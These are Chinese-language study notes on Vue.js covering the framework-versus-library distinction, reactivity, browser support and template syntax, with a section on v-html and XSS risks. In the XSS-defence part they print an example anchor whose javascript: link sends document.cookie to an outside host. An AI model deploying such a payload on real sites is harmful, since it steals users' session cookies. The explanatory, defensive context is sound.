>框架 和 库 的区别 `库(插件)`：是一种封装好的特定方法集合，对项目的侵入性较小，提供给开发 者使用，控制权在使用者手中，如果某个库无法完成某些需求，可以很容易切换到 其它库实现需求; `框架`：是一套架构，会基于自身特点向用户提供一套相当完整的解决方案，而且 控制权在框架本身；对项目的侵入性较大，使用者要按照框架所规定的某种特定规 范进行开发，项目如果需要更换框架，则需要重新架构整个项目。 >vue的两个核心 >1.响应式的数据绑定：当数据发生改变，视图可以自动更新，可以不用关心dom 操作，而专心数据操作； >2.可组合的视图组件：把视图按照功能切分成若干基本单元，组件可以一级一级组 合整个应用形成倒置组件树，可维护，可重用，可测试； >兼容性 >Vue(2) 不支持 IE8 及以下版本，因为 Vue 使用了 IE8 无法模拟的 ECMAScript 5 特 性。但它支持所有兼容 ECMAScript 5 的浏览器。 >Vue 模板语法 * Mustache -- 双括号语法 >语法格式双大括号'{{}}',用在html标签之间，不能写在标签属性中。 >语法中可以使用js表达式，但只限于Vue实例作用域和Vue沙盒白名单，白名单规定了一些全局变量例如Math和Date。 >表达式一些基本表达式，和一些三元运算例如：`{{num + 1}}`、`{{status ? 'succeed' : 'failed'}}`、`{{changeTime()}}`、`{value.replace(/,/g,"")}`。 >不支持流控制例如:`{{ if (ok) { return message } }}` * v-text -- 文本渲染 >v-text 能展示对应data中数据内容，也能在数据基础上做运算。 >v-text 会把标签中的内容替换。 * v-html -- html标签渲染 >将标签语义化展示在页面上 >容易产生xss攻击，请只对可信内容使用 HTML 插值，绝不要对用户提供的内容使用插值。 >如何防止xss攻击: >>前端过滤 >>后台转义(< > `&lt;` `&gt;`) >>给cookie 加上属性 http例如: >>`<a href=javascript:location.href='http://www.baidu.com?cookie='+document.cookie>click</a>` >三种将数据渲染到页面的方法总结 >* `{{}}` 最被常用但是在加载的时候会出现闪烁问题，而且只能把html标签当字符串渲染； >* `v-text` 虽然没有数据加载闪烁问题，但是会将标签中间的数据覆盖，也不能渲染html格式数据; >* `v-html` 谨慎使用会出现xss攻击的风险。 https://ihavenolimitations.xyz/cyyspring/vuejs/936538